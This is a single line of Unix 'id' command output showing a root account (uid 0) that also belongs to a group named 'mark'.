uid=0(root) gid=0(root) groups=0(root),1001(mark)